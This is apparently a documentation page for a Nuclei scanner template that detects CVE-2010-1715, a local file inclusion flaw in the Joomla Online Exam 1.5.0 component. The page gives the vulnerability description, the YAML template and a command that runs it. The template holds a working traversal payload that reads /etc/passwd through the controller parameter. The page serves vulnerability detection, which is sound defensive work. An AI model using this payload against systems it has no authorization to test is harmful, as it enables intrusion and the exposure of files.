Joomla! Component Online Exam 1.5.0 - Local File Inclusion
ID: CVE-2010-1715
Severity: medium
Author: daffainfo
Tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu
Description
Section titled “Description”A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-1715
info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. remediation: | Update to the latest version of Joomla! Component Online Exam and apply any available patches or security updates. reference: - https://www.exploit-db.com/exploits/12174 - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 epss-percentile: 0.85468 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: pucit.edu product: com_onlineexam tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402201ab3ba324eadc3e5ad8a9fbe4c1dfd31874b193d4a46ca14a2c86a8f1f1ee6e2022066a1ef0f68aff22d90df3c7e00d8eed41ecf198a4cc6b243da670c1de73b6a88:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-1715.yaml"